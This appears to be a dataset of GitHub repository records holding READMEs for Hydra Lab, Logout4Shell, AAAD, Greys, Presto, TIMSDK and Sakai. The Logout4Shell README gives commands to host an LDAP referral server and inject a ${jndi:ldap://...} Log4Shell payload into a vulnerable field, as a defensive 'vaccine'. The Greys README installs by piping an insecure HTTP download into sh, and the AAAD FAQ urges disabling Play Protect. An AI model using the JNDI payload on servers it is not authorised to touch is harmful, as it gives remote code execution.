- - -## What is Hydra Lab? - -As mentioned in the above video, Hydra Lab is a framework that can help you easily build a cloud-testing platform utilizing the test devices/machines in hand. - -Capabilities of Hydra Lab include: -- Scalable test device management under the center-agent distributed design; Test task management and test result visualization. -- Powering [Android Espresso Test](https://developer.android.com/training/testing/espresso), and Appium(Java) test on different platforms: Windows/iOS/Android/Browser/Cross-platform. -- Case-free test automation: Monkey test, Smart exploratory test. - -For more details, you may refer to: -- [Introduction: What is Hydra Lab?](https://github.com/microsoft/HydraLab/wiki) -- [How Hydra Lab Empowers Microsoft Mobile Testing and Test Intelligence](https://medium.com/microsoft-mobile-engineering/how-hydra-lab-empowers-microsoft-mobile-testing-e4bd831ecf41) - - -## Get Started - -Please visit our **[GitHub Project Wiki](https://github.com/microsoft/HydraLab/wiki)** to understand the dev environment setup procedure: [Contribution Guideline](CONTRIBUTING.md). - -**Supported environments for Hydra Lab agent**: Windows, Mac OSX, and Linux ([Docker](https://github.com/microsoft/HydraLab/blob/main/agent/README.md#run-agent-in-docker)). - -**Supported platforms and frameworks matrix**: - -| | Appium(Java) | Espresso | XCTest | Maestro | Python Runner | -| ---- |--------------|---- | ---- | ---- | --- | -|Android| ✔ | ✔ | x | ✔ | ✔ | -|iOS| ✔ | x | ✔ | ✔ | ✔ | -|Windows| ✔ | x | x | x | ✔ | -|Web (Browser)| ✔ | x | x | x | ✔ | - - -### Quick guide on out-of-box Uber docker image - -Hydra Lab offers an out-of-box experience of the Docker image, and we call it `Uber`. You can follow the below steps and start your docker container with both a center instance and an agent instance: - -**Step 1. Download and install [Docker](https://www.docker.com)** - -**Step 2. Download latest Uber Docker image** -```bash -docker pull ghcr.io/microsoft/hydra-lab-uber:latest -``` -**This step is necessary.** Without this step and jump to step 3, you may target at the local cached Docker image with `latest` tag if it exists. - -**Step 3. Run on your machine** - -By Default, Hydra Lab will use the local file system as a storage solution, and you may type the following in your terminal to run it: - -```bash -docker run -p 9886:9886 --name=hydra-lab ghcr.io/microsoft/hydra-lab-uber:latest -``` - -> We strongly recommend using [Azure Blob Storage](https://azure.microsoft.com/en-us/products/storage/blobs/) service as the file storage solution, and Hydra Lab has native, consistent, and validated support for it. - -**Step 3. Visit the web page and view your connected devices** - -> Url: http://localhost:9886/portal/index.html#/ (or your custom port). - -Enjoy starting your journey of exploration! - -**Step 4. Perform the test procedure with a minimal setup** - -Note: For Android, Uber image only supports **Espresso/Instrumentation** test. See the ""User Manual"" section on this page for more features: [Hydra Lab Wikis](https://github.com/microsoft/HydraLab/wiki). - -**To run a test with Uber image and local storage:** -- On the front-end page, go to the `Runner` tab and select `HydraLab Client`. -- Click `Run` and change ""Espresso test scope"" to `Test app`, click `Next`. -- Pick an available device, click `Next` again, and click `Run` to start the test. -- When the test is finished, you can view the test result in the `Task` tab on the left navigator of the front-end page. - -![Test trigger steps](docs/images/test-trigger-steps.png) - - -### Build and run Hydra Lab from the source - -You can also run the center java Spring Boot service (a runnable Jar) separately with the following commands: - -> The build and run process will require JDK11 | NPM | Android SDK platform-tools in position. - -**Step 1. Run Hydra Lab center service** - -```bash -# In the project root, switch to the react folder to build the Web front. -cd react -npm ci -npm run pub -# Get back to the project root, and build the center runnable Jar. -cd .. -# For the gradlew command, if you are on Windows please replace it with `./gradlew` or `./gradlew.bat` -gradlew :center:bootJar -# Run it, and then visit http://localhost:9886/portal/index.html#/ -java -jar center/build/libs/center.jar -# Then visit http://localhost:9886/portal/index.html#/auth to generate a new agent ID and agent secret. -``` - -> If you encounter the error: `Error: error:0308010C:digital envelope routines::unsupported`, set the System Variable `NODE_OPTIONS` as `--openssl-legacy-provider` and then restart the terminal. - -**Step 2. Run Hydra Lab agent service** - -```bash -# In the project root -cd android_client -# Build the Android client APK -./gradlew assembleDebug -cp app/build/outputs/apk/debug/app-debug.apk ../common/src/main/resources/record_release.apk -# If you don't have the SDK for Android ,you can download the prebuilt APK in https://github.com/microsoft/HydraLab/releases -# Back to the project root -cd .. -# In the project root, copy the sample config file and update the: -# YOUR_AGENT_NAME, YOUR_REGISTERED_AGENT_ID and YOUR_REGISTERED_AGENT_SECRET. -cp agent/application-sample.yml application.yml -# Then build an agent jar and run it -gradlew :agent:bootJar -java -jar agent/build/libs/agent.jar -``` - -**Step 3. visit http://localhost:9886/portal/index.html#/ and view your connected devices** - -### More integration guidelines: - -- [Test agent setup](https://github.com/microsoft/HydraLab/wiki/Test-agent-setup) -- [Trigger a test task run in the Hydra Lab test service](https://github.com/microsoft/HydraLab/wiki/Trigger-a-test-task-run-in-the-Hydra-Lab-test-service) -- [Deploy Center Docker Container](https://github.com/microsoft/HydraLab/wiki/Deploy-Center-Docker-Container) - - -## Contribute - -Your contribution to Hydra Lab will make a difference for the entire test automation ecosystem. Please refer to **[CONTRIBUTING.md](CONTRIBUTING.md)** for instructions. - -### Contributor Hero Wall: - - - - - - -## Contact Us - -You can reach us by [opening an issue](https://github.com/microsoft/HydraLab/issues/new) or [sending us mails](mailto:hydra_lab_support@microsoft.com). - - - -## Microsoft Give Sponsors - -Thank you for your contribution to [Microsoft employee giving program](https://aka.ms/msgive) in the name of Hydra Lab: - -[@Germey(崔庆才)](https://github.com/Germey), [@SpongeOnline(王创)](https://github.com/SpongeOnline), [@ellie-mac(陈佳佩)](https://github.com/ellie-mac), [@Yawn(刘俊钦)](https://github.com/Aqinqin48), [@White(刘子凡)](https://github.com/jkfhklh), [@597(姜志鹏)](https://github.com/JZP1996), [@HCG(尹照宇)](https://github.com/mahoshojoHCG) - - -## License & Trademarks - -The entire codebase is under [MIT license](https://github.com/microsoft/HydraLab/blob/main/LICENSE). - -This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow [Microsoft’s Trademark & Brand Guidelines](https://www.microsoft.com/en-us/legal/intellectualproperty/trademarks/usage/general). Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party’s policies. - -We use the Microsoft Clarity Analysis Platform for front end client data dashboard, please refer to [Clarity Overview](https://learn.microsoft.com/en-us/clarity/setup-and-installation/about-clarity) and https://clarity.microsoft.com/ to learn more. - -Instructions to turn off the Clarity: - -Open [MainActivity](https://github.com/microsoft/HydraLab/blob/main/android_client/app/src/main/java/com/microsoft/hydralab/android/client/MainActivity.java), comment the line which call the initClarity(), and rebuild the Hydra Lab Client apk, repalce the one in the agent resources folder. - -[Telemetry/data collection notice](https://docs.opensource.microsoft.com/releasing/general-guidance/telemetry) - -",0 -Cybereason/Logout4Shell,Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell,2021-12-10T22:38:53Z,,"# Logout4Shell -![logo](https://github.com/Cybereason/Logout4Shell/raw/main/assets/CR_logo.png) - -## Description - -A vulnerability impacting Apache Log4j versions 2.0 through 2.14.1 was disclosed on the project’s Github on December 9, 2021. -The flaw has been dubbed “Log4Shell,”, and has the highest possible severity rating of 10. Software made or -managed by the Apache Software Foundation (From here on just ""Apache"") is pervasive and comprises nearly a third of all -web servers in the world—making this a potentially catastrophic flaw. -The Log4Shell vulnerability CVE-2021-44228 was published on 12/9/2021 and allows remote code execution on vulnerable servers. - - -While the best mitigation against these vulnerabilities is to patch log4j to -~~2.15.0~~2.17.0 and above, in Log4j version (>=2.10) this behavior can be partially mitigated (see below) by -setting system property `log4j2.formatMsgNoLookups` to `true` or by removing -the JndiLookup class from the classpath. - -On 12/14/2021 the Apache software foundation disclosed CVE-2021-45046 which was patched in log4j version 2.16.0. This -vulnerability showed that in certain scenarios, for example, where attackers can control a thread-context variable that -gets logged, even the flag `log4j2.formatMsgNoLookups` is insufficient to mitigate log4shell. An -additional CVE, less severe, CVE-2021-45105 was discovered. This vulnerability exposes the server to -an infinite recursion that could crash the server is some scenarios. It is recommened to upgrade to -2.17.0 - -However, enabling these system property requires access to the vulnerable servers as well as a restart. -The [Cybereason](https://www.cybereason.com) research team has developed the -following code that _exploits_ the same vulnerability and the payload therein -sets the vulnerable setting as disabled. The payload then searches -for all `LoggerContext` and removes the JNDI `Interpolator` preventing even recursive abuses. -this effectively blocks any further attempt to exploit Log4Shell on this server. - -This Proof of Concept is based on [@tangxiaofeng7](https://github.com/tangxiaofeng7)'s [tangxiaofeng7/apache-log4j-poc](https://github.com/tangxiaofeng7/apache-log4j-poc) - -However, this project attempts to fix the vulnerability by using the bug against itself. -You can learn more about Cybereason's ""vaccine"" approach to the Apache Log4Shell vulnerability (CVE-2021-44228) on our website. - -Learn more: [Cybereason Releases Vaccine to Prevent Exploitation of Apache Log4Shell Vulnerability (CVE-2021-44228)](https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228) - -## Supported versions -Logout4Shell supports log4j version 2.0 - 2.14.1 - -## How it works -On versions (>= 2.10.0) of log4j that support the configuration `FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS`, this value is -set to `True` disabling the lookup mechanism entirely. As disclosed in CVE-2021-45046, setting this flag is insufficient, -therefore the payload searches all existing `LoggerContexts` and removes the JNDI key from the `Interpolator` used to -process `${}` fields. This means that even other recursive uses of the JNDI mechanisms will fail. -Then, the log4j jarfile will be remade and patched. The patch is included in this -git repository, however it is not needed in the final build because the real patch -is included in the payload as Base64. - -In persistence mode (see [below](#transient-vs-persistent-mode)), the payload additionally attempts to locate the `log4j-core.jar`, -remove the `JndILookup` class, and modify the PluginCache to completely remove the JNDI plugin. Upon subsequent JVM -restarts the `JndiLookup` class cannot be found and log4j will not support for JNDI - -## Transient vs Persistent mode -This package generates two flavors of the payload - Transient and Persistent. -In Transient mode, the payload modifies -the current running JVM. The payload is very delicate to just touch the logger context and configuration. We thus -believe the risk of using the Transient mode are very low on production environments. - -Persistent mode performs all the changes of the Transient mode and *in addition* searches for the jar from which `log4j` -loads the `JndiLookup` class. It then attempts to modify this jar by removing the `JndiLookup` class as well as -modifying the plugin registry. There is inherently more risk in this approach as if the `log4j-core.jar` becomes -corrupted, the JVM may crash on start. - -The choice of which mode to use is selected by the URL given in step [2.3](#execution) below. The -class `Log4jRCETransient` selects the Transient Mode and the class `Log4jRCEPersistent` selects the persistent mode - -Persistent mode is based on the work of [TudbuT](https://github.com/TudbuT). Thank you! - -## How to use - -1. Download this repository and build it - - 1.1 `git clone https://github.com/cybereason/Logout4Shell.git` - - 1.2 build it - `mvn package` - - 1.3 `cd target/classes` - - 1.4 run the webserver - `python3 -m http.server 8888` - -2. Download, build and run Marshalsec's ldap server - - 2.1 `git clone https://github.com/mbechler/marshalsec.git` - - 2.2 `mvn package -DskipTests` - - 2.3 `cd target` - - 2.4 `java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer ""http://:8888/#Log4jRCE""` - -4. To immunize a server - - 3.1 enter `${jndi:ldap://:1389/a}` into a vulnerable field (such as user name) - - -## DISCLAIMER: -The code described in this advisory (the “Code”) is provided on an “as is” and -“as available” basis may contain bugs, errors and other defects. You are -advised to safeguard important data and to use caution. By using this Code, you -agree that Cybereason shall have no liability to you for any claims in -connection with the Code. Cybereason disclaims any liability for any direct, -indirect, incidental, punitive, exemplary, special or consequential damages, -even if Cybereason or its related parties are advised of the possibility of -such damages. Cybereason undertakes no duty to update the Code or this -advisory. - -## License -The source code for the site is licensed under the MIT license, which you can find in the LICENSE file. -",0 -shmykelsa/AAAD,,2021-04-28T07:36:37Z,,"# AAAD [![Crowdin](https://badges.crowdin.net/aaad/localized.svg)](https://crowdin.com/project/aaad) - - -![banner](https://i.imgur.com/EeT5Y3v.png) - - -Android Auto Apps Downloader (AAAD) is an app for Android Phones that downloads popular Android Auto 3rd party apps and installs them in the correct way to have them in Android Auto. - -For the first time in 3 years, now users with **non-rooted Android devices** can enjoy these apps made for Android Auto, and Android Auto Apps Downloader does it all for you. Simply select an app you want to install on your phone and the download will begin. Once completed, install the given app with the classic Android interface and you can start enjoying the app you’ve just downloaded on Android Auto. - -### No need for a PC. No developer options. No need of grabbing APKs and patch them. No root needed - -AAAD can be easily installed on any Android phone and the whole installing process takes place only on it. You will not need to activate developer settings, neither in main settings nor in Android Auto. - -The main goal of this app is having the listed apps in Android Auto with a pain free experience and, most of all, without requiring a rooted phone. - -If you are instead running a rooted device, you might want to consider the free alternative [AA AIO TWEAKER](https://github.com/shmykelsa/AA-Tweaker), which has an alternative root method to patch the apps and it has a lot of other cool features that you can activate or pre-activate on Android Auto! - -AAAD is free and offers in app purchases. The free version of the app allows up to 1 download every 30 days. With the PRO version you can enjoy the full experience and download as many times as you want, forever! - -# 🚨🚨‼‼ KNOWN ISSUES ‼‼🚨🚨 - -**Oppo/Realme/OnePlus devices won't show apps or ""No messages during drive""** - Please apply [this fix](https://github.com/shmykelsa/AAAD/wiki/Fix-for-OnePlus-Realme-Oppo) - -**Google Pixel: ""No new messages during drive"" - Android 13** - Please apply [this fix](https://github.com/shmykelsa/AAAD/wiki/Fix-for-Pixel-Android-13-) before installing - -**Android 14: Not compatible as of now** - -**""This organization is currently ineligible to receive donations"" - Please download AAAD only from this website, 3rd party downloads are not authorized, endorsed nor supported by our staff** - - **GiroPay/Ideal/Przelewy24/Bancontact/EPS Payment has not been recognized by the app - Please follow[ this link](mailto:help.aaad@gmail.com?subject=AAADSI&body=Hello%2C%0D%0A%0D%0Athis%20is%20a%20pre-formatted%20e-mail.%20Please%20DO%20NOT%20edit%20the%20subject%20above%20and%20modify%20the%20e-mail%20with%20the%20right%20details.%20After%20sending%20the%20e-mail%20you%20will%20receive%20instructions%20on%20how%20to%20activate%20from%20email%20help.aaad%2Bcanned.response%40gmail.com.%20Please%20also%20check%20spam%20folder%20if%20nothing%20came%20to%20you.%0D%0A%0D%0AMethod%20of%20payment%3A%0D%0ALast%20four%20(4)%20digits%20of%20the%20card%20used%20(if%20applicable)%3A%0D%0ADate%20(and%20time%20if%20possible)%3A%0D%0AFull%20name%3A%0D%0A%0D%0A)** - -**Fermata Auto download shows ""App not responding (wait or close)""** - Fermata is quite heavy to download and GitHub servers are not the easiest with downloads. Please keep pressing on ""wait"". If it does fail, select top menu, select help and contact us through the app describing the steps you take to reproduce the issue. - -**A factory reset wipes the license away** - [Click here](mailto:help.aaad@gmail.com?subject=PROWIPED&body=Hello%2C%0D%0A%0D%0Amy%20license%20was%20lost%20after%20a%20device%20reset.%0D%0A%0D%0AThe%20e-mail%20I%E2%80%99ve%20registered%20for%20my%20payment%20is%3A%20****MODIFY%20HERE****%0D%0A%0D%0ARegards%0D%0A%0D%0A>) - -**Google Play Protect erased the downloaded apps** - There's a deeper explanation [down here](#i-have-a-warning-from-google-play-protect-warning-me-about-your-app-is-this-app-a-malware). Please take a depp look before proceeding with installing any app. The install button is usually hidden and the big blue button **WILL NOT** install the app you've chosen. Please use the ""Install anyway"" button instead. - - -### [GO TO DOWNLOAD](https://github.com/shmykelsa/AAAD/releases) - -### Updates - -If you want to stay updated with development, you can check out the [dedicated Telegram Channel](https://t.me/AAADupdates). Be sure to watch the repository with the banner on the top right, you will be notified via mail if AAAD gets updated (GitHub account needed)! Star us if you really think AAAD is a good software :) - -PRO version of the app can be activated directly and automatically inside the app and it will be bind to one device and the PRO or FREE version (including the date of next download) of the app will survive app uninstall. - -# Notes - -Android Auto Apps Downloader **does not grant** in any way that the provided apps available for installing will actually work on Android Auto. The installing method can fail anytime if Google applies changes to Android Auto. Any software installed by Android Auto Apps Downloader is provided ""as it is"" and no support can be given by me for malfunctioning apps or malfunctioning Android Auto. - -# F.A.Q. - -### How can I have support for this app? - -You can contact help team through AAAD app (top right menu > ""help""). We are a very small team working from Italy so please keep patience with us in case you write us over night! - -### How do I obtain a license? - -To get started, press the bottom text of the AAAD app. - -### Can I pay for a license outside the app? - -Sure you can. Feel free to [pay through Stripe](https://buy.stripe.com/14k5mQ3ih6l7dMs8ww) or donate any amount (equal or bigger than the asking price - 3.50 EUR) [via PayPal](https://www.paypal.com/donate/?hosted_button_id=V666UVPT9C5CJ), and keep the donation receipt (bank statement, confirmation page, e-mail etc.). Then please [click here](mailto:help.aaad@gmail.com?subject=%5BGW%5D&body=Please%20don%E2%80%99t%20modify%20the%20subject%20above%20and%20feel%20free%20to%20modify%20this%20body%20leaving%20a%20small%20thought.%20An%20automatic%20response%20will%20then%20guide%20you%20to%20the%20following%20steps%20%3A)) or write an e-mail to help.aaad@gmail.com and write ""[GW]"" in the subject, and be sure to include also a small thought :). An automatic reply will guide you to the stepts to take after. - -### What will a license of AAAD give me? - -The license for AAAD pro will give you access to unlimited downloads. - -### Do I have to buy a license to have the apps working while the vehicle is not parked? - -No. AAAD pro does only give access to unlimited downloads. - -### I've downloaded the app ""xxx"" from AAAD but it's not working well. What can I do? - -The best thing is to ask the app's developer as we do not offer support for the apps inside AAAD. The apps are provided ""as-is"", and being developed by someone else, nobody from AAAD will be able to give the proper technical support for them. As long as the app is listed on Android Auto, apart from the ""No new messages during drive"" bug, then AAAD is working just as designed. If your app is not listed at all or suffers from the ""No new messages during drive"" contact help through AAAD app (top right menu > ""help""). - -### Why the heck do I need this app? Can’t I just install the apps by myslef? - -Well yes, you could, but they would not appear in Android Auto. Since the beginning of 2018 the custom apps for Android Auto are blocked by Google, but AAAD installs them in a special way in order to actually see the apps on Android Auto. And no root is needed! Call it magic, if you will. If you have a rooted phone, check out [AA AIO TWEAKER](https://github.com/shmykelsa/AA-Tweaker) instead. - -### I have a warning from Google Play Protect warning me about your app! Is this app a malware? - -AAAD does not contain any malware, and neither the apps inside it. Google obviously doesn't like Android Auto modding because of driving security. If you want to avoid any warning you'd want to know that Google Play Protect does not really have any anti-virus feature, rather it just warns of apps that Google doesn't like because of various reasons (e.g. installing other apps like Google Play Store does or contain third party in app purchase system). You can safely disable it by heading into Google Play Store's settings. - -### Why only these apps? Where is YouTube? Where is Netflix? Where is Instagram? - -Not all apps are compatible with Android Auto. You can’t just pick an app and sledge-hammer it into Android Auto. As a rule of thumb, no app from Google Play Store will be ever included in AAAD (unless such app has a different APK distributed in another platform). Apps coming from the Play Store are automatically available on Android Auto. Obviously, Google allows only certain types of apps on its store (navigation, music, messages, VOIP). Whenever an app implements Android Auto as functionality, it can't be falling in a different category from the ones allowed by Google. - -AAAD includes basically almost every Android Auto app known to date, and the only responsibility of AAAD is to make them available in Android Auto. If you know for sure there's an app compatible with Android Auto that is not included in AAAD, write to [submit.aaad@gmail.com](mailto:submit.aaad@gmail.com) - -### How do I update the apps installed from AAAD? - -AAAD will always download latest version of an app. If one of the apps that you've installed through AAAD gets an update, you can open AAAD and download the update. At the moment, there's no update checker, but I'm planning on making it! - -### Will you hold my bank account/credit card informations? - -No. All the details of payment are held by Stripe Inc. and not processed nor passed to myself in any way. Also, I don't really care. - -### Will this app be available on the Play Store? - -No. It is only officially distributed on GitHub. - -### Has the license an expiration date? - -No. AAAD is not a subscription, and once a license is obtained you won't be charged anymore. - -### What happens if I change my device? - -You can transfer a license with the feature ""Transfer license"" on the top right menu. The license will be crypted inside the device with a key that we will not hold in any way and the above method is the only way to move a license for AAAD pro. - -### What happens if I uninstall AAAD? - -Nothing. The date for next download will not be impacted and neither your AAAD pro version. - -# License - -Part of the source code of the app is shared so that changes can be implemented by whoever wants to do so for personal use, the full version of the software is **NOT** free, and you are not allowed to redistirbute modified versions of it, neither as a free application, niether as a commercial product. If you are intending to do so please seek my explicit writing approval for doing so. However you are allowed to modify the software as you wish as long as the modified version is **only** ever used by yourself. For more informations [please read the EULA](https://github.com/shmykelsa/AAAD/blob/main/LICENSE). - -### Copyright -Gabriele Rizzo (shmykelsa) © - 2023 - Lecce, Italia -",0 -oldmanpushcart/greys-anatomy,Java诊断工具,2012-11-21T19:39:35Z,,"![LOGO icon](https://raw.githubusercontent.com/oldmanpushcart/images/master/greys/greys-logo-readme.png) - -> -线上系统为何经常出错?数据库为何屡遭黑手?业务调用为何频频失败?连环异常堆栈案,究竟是哪次调用所为? -数百台服务器意外雪崩背后又隐藏着什么?是软件的扭曲还是硬件的沦丧? -走进科学带你了解Greys, Java线上问题诊断工具。 - -# 相关文档 - -* [关于软件](https://github.com/oldmanpushcart/greys-anatomy/wiki/Home) -* [程序安装](https://github.com/oldmanpushcart/greys-anatomy/wiki/installing) -* [入门说明](https://github.com/oldmanpushcart/greys-anatomy/wiki/Getting-Started) -* [常见问题](https://github.com/oldmanpushcart/greys-anatomy/wiki/FAQ) -* [更新记事](https://github.com/oldmanpushcart/greys-anatomy/wiki/Chronicle) -* [详细文档](https://github.com/oldmanpushcart/greys-anatomy/wiki/greys-pdf) -* [English-README](https://github.com/oldmanpushcart/greys-anatomy/blob/master/Greys_en.md) - -# 程序安装 - -- 远程安装 - - ```shell - curl -sLk http://ompc.oss.aliyuncs.com/greys/install.sh|sh - ``` - -- 远程安装(短链接) - - ```shell - curl -sLk http://t.cn/R2QbHFc|sh - ``` - -## 最新版本 - -### **VERSION :** 1.7.6.6 - -1. 支持JDK9 -2. greys.sh脚本支持tar的解压缩模式(有些机器没有unzip),默认unzip -3. 修复 #219 问题 - -### 版本号说明 - -`主版本`.`大版本`.`小版本`.`漏洞修复` - -* 主版本 - - 这个版本更新说明程序架构体系进行了重大升级,比如之前的0.1版升级到1.0版本,整个软件的架构从单机版升级到了SOCKET多机版。并将Greys的性质进行的确定:Java版的HouseMD,但要比前辈们更强。 - -* 大版本 - - 程序的架构设计进行重大改造,但不影响用户对这款软件的定位。 - -* 小版本 - - 增加新的命令和功能 - -* 漏洞修复 - - 对现有版本进行漏洞修复和增强 - - - `主版本`、`大版本`、之间不做任何向下兼容的承诺,即`0.1`版本的Client不保证一定能正常访问`1.0`版本的Server。 - - - `小版本`不兼容的版本会在版本升级中指出 - - - `漏洞修复`保证向下兼容 - -# 维护者 - -* [李夏驰](http://www.weibo.com/vlinux) -* [姜小逸又胖了](http://weibo.com/chengtd) - - -# 程序编译 - -- 打开终端 - - ```shell - git clone git@github.com:oldmanpushcart/greys-anatomy.git - cd greys-anatomy/bin - ./greys-packages.sh - ``` - -- 程序执行 - - 在`target/`目录下生成对应版本的release文件,比如当前版本是`1.7.0.4`,则生成文件`target/greys-1.7.0.4-bin.zip` - - 程序在本地编译时会主动在本地安装当前编译的版本,所以编译完成后即相当在本地完成了安装。 - - -# 写在后边 - -## 心路感悟 - -我编写和维护这款软件已经5年了,5年中Greys也从`0.1`版本一直重构到现在的`1.7`。在这个过程中我得到了许多人的帮助与建议,并在年底我计划发布`2.0`版本,将开放Greys的底层通讯协议,支持websocket访问。 - -多年的问题排查经验我没有过多的分享,一个Java程序员个中的苦闷也无从分享,一切我都融入到了这款软件的命令中,希望这些沉淀能帮助到可能需要到的你少走一些弯路,同时我也非常期待你们对她的反馈,这样我将感到非常开心和有成就感。 - -## 帮助我们 - -Greys的成长需要大家的帮助。 - -- **分享你使用Greys的经验** - - 我非常希望能得到大家的使用反馈和经验分享,如果你有,请将分享文章敏感信息脱敏之后邮件给我:[oldmanpushcart@gmail.com](mailto:oldmanpushcart@gmail.com),我将会分享给更多的同行。 - -- **帮助我完善代码或文档** - - 一款软件再好,也需要详细的帮助文档;一款软件再完善,也有很多坑要埋。今天我的精力非常有限,希望能得到大家共同的帮助。 - -- **如果你喜欢这款软件,欢迎打赏一杯咖啡** - - 嗯,说实话,我是指望用这招来买辆玛莎拉蒂...当然是个玩笑~你们的鼓励将会是我的动力,钱不在乎多少,重要的是我将能从中得到大家善意的反馈,这将会是我继续前进的动力。 - - ![alipay](https://raw.githubusercontent.com/oldmanpushcart/images/master/alipay-vlinux.png) - -## 联系我们 - -有问题阿里同事可以通过旺旺找到我,阿里外的同事可以通过[我的微博](http://weibo.com/vlinux)联系到我。今晚的杭州大雪纷飞,明天西湖应该非常的美丽,大家晚安。 - -菜鸟-杜琨(dukun@alibaba-inc.com) - -",0 -prestodb/presto,The official home of the Presto distributed SQL query engine for big data,2012-08-09T01:03:37Z,,"# Presto - -Presto is a distributed SQL query engine for big data. - -See the [User Manual](https://prestodb.github.io/docs/current/) for deployment instructions and end user documentation. - -## Contributing! - -Please refer to the [contribution guidelines](https://github.com/prestodb/presto/blob/master/CONTRIBUTING.md) to get started - -## Questions? - -[Please join our Slack channel and ask in `#dev`](https://communityinviter.com/apps/prestodb/prestodb).",0 -TencentCloud/TIMSDK,"Tencent Cloud Chat features a comprehensive suite of solutions including global access, one-to-one chat, group chat, message push, profile and relationship chain hosting, and account authentication. ",2019-01-17T07:35:20Z,,"English | [简体中文](./README_ZH.md) - -Notice: If you open a pull request in TUIKit Android or iOS and the corresponding changes are successfully merged, your name will be included in README.md with a hyperlink to your homepage on GitHub. - -# Instant Messaging -## Product Introduction -Build real-time social messaging capabilities with all the features into your applications and websites based on powerful and feature-rich chat APIs, SDKs and UIKit components. - - - - - - - - - - -
Android Experience AppiOS Experience App
- -TUIKit is a UI component library based on Tencent Cloud IM SDK. It provides universal UI components to offer features such as conversation, chat, search, relationship chain, group, and audio/video call features. - - - -## Image Download - -Tencent Cloud branch download address: [Download](https://im.sdk.qcloud.com/download/github/TIMSDK.zip) - -## SDK Download - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Native SDK - Download Address -Integration Guide -Update Log -
Android GitHub (Recommended)[Quick Integration] TUIKit Integration (Android)
[General Integration] SDK Integration (Android)
Update Log (Native)
iOS GitHub (Recommended)[Quick Integration] TUIKit Integration (iOS)
[General Integration] SDK Integration (iOS)
Mac GitHub (Recommended)[General Integration] SDK Integration (Mac)
Windows GitHub (Recommended)[General Integration] SDK Integration (Windows)
HarmonyOS GitHub (Recommended)[General Integration] SDK Integration (HarmonyOS)
- -## TUIKit Integration - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Functional ModulePlatformDocument Link
TUIKit LibraryiOSTUIKit-iOS Library
AndroidTUIKit-Android Library
Quick IntegrationiOSTUIKit-iOS Quick Integration
AndroidTUIKit-Android Quick Integration
Modifying UI ThemesiOSTUIKit-iOS Modifying UI Themes
AndroidTUIKit-Android Modifying UI Themes
Setting UI StylesiOSTUIKit-iOS Setting UI Styles
AndroidTUIKit-Android Setting UI Styles
Adding Custom MessagesiOSTUIKit-iOS Adding Custom Messages
AndroidTUIKit-Android Adding Custom Messages
Implementing Local SearchiOSTUIKit-iOS Implementing Local Search
AndroidTUIKit-Android Implementing Local Search
Integrating Offline PushiOSTUIKit-iOS Integrating Offline Push
AndroidTUIKit-Android Integrating Offline Push
- -## Guidelines for Upgrading IMSDK to V2 APIs - -[API Upgrade Guidelines](https://docs.qq.com/sheet/DS3lMdHpoRmpWSEFW) - -## Latest Enhanced Version 7.9.5680 @2024.04.19 -### SDK - -- Fix the issue of the pinned message list returning in the wrong order -- Fix the issue of incorrect parsing of the Tips type of pinned messages -- Fix the issue of log writing failure on some Android phones -- Fix the occasional incomplete retrieval of group roaming messages from old to new -- Fix the occasional inability to retrieve local messages when pulling historical messages from topics -- Fix the issue where sessions deleted from the conversation group are reactivated after logging in again -",0 -sakaiproject/sakai,"Sakai is a freely available, feature-rich technology solution for learning, teaching, research and collaboration. Sakai is an open source software suite developed by a diverse and global adopter community.",2014-12-29T11:14:17Z,,"# Sakai Collaboration and Learning Environment (Sakai CLE) - -This is the source code for the Sakai CLE. - -The master branch is the most current development release, Sakai 24. -The other branches are currently or previously supported releases. See below for more information on the release plan and support schedule. - -## Building - -[![Build Status](https://travis-ci.org/sakaiproject/sakai.svg?branch=master)](https://travis-ci.org/sakaiproject/sakai) -[![Codacy Badge](https://api.codacy.com/project/badge/Grade/c68908d6bc044e95b453bae7ddcbad4a)](https://www.codacy.com/app/sakaiproject/sakai?utm_source=github.com&utm_medium=referral&utm_content=sakaiproject/sakai&utm_campaign=Badge_Grade) - -This is the ""Mini Quick Start"" for more complete steps to get Sakai configured please look at [this guide on the wiki](https://github.com/sakaiproject/sakai/wiki/Quick-Start-from-Source). - -To build Sakai you need Java 1.8. Once you have, clone a copy of this repository you can -build it by running (or `./mvnw install` if you don't have Maven installed): -``` -mvn install -``` - -## Running - -Sakai runs on Apache Tomcat 9. Download the latest version from http://tomcat.apache.org and extract the archive. -*Note: Sakai does not work with Tomcat installed via a package from apt-get, yum or other package managers.* - -You **must** configure Tomcat according to the instructions on this page: -https://sakaiproject.atlassian.net/wiki/spaces/DOC/pages/17310646930/Sakai+21+Install+Guide+Source - -When you are done, deploy Sakai to Tomcat: -``` -mvn clean install sakai:deploy -Dmaven.tomcat.home=/path/to/your/tomcat -``` - -Now start Tomcat: -``` -cd /path/to/your/tomcat/bin -./startup.sh && tail -f ../logs/catalina.out -``` - -Once Sakai has started up (it usually takes around 30 seconds), open your browser and navigate to http://localhost:8080/portal - -## Licensing - -Sakai is licensed under the [Educational Community License version 2.0](http://opensource.org/licenses/ECL-2.0) - -Sakai is an [Apereo Foundation](http://www.apereo.org) project and follows the Foundation's guidelines and requirements for [Contributor License Agreements](https://www.apereo.org/licensing). - -## Contributing - -See [our dedicated page](CONTRIBUTING.md) for more information on contributing to Sakai. - -## Bugs - -For filing bugs against Sakai please use our Jira instance: https://jira.sakaiproject.org/ - -## Nightly servers -For testing out the latest builds go to the [nightly server page](http://nightly2.sakaiproject.org) - -## Get in touch -If you have any questions, please join the Sakai developer mailing list: To subscribe send an email to sakai-dev+subscribe@apereo.org - -To see a full list of Sakai email lists and other communication channels, please check out this Sakai wiki page: -https://confluence.sakaiproject.org/display/PMC/Sakai+email+lists - -If you want more immediate response during M-F typical business hours you could try our Slack channels. - -https://apereo.slack.com/signup - -If you can't find your ""at institution.edu"" on the Apereo signup page then send an email requesting access for yourself and your institution either to sakai-qa-planners@apereo.org or sakaicoordinator@apereo.org. - -## Community supported versions 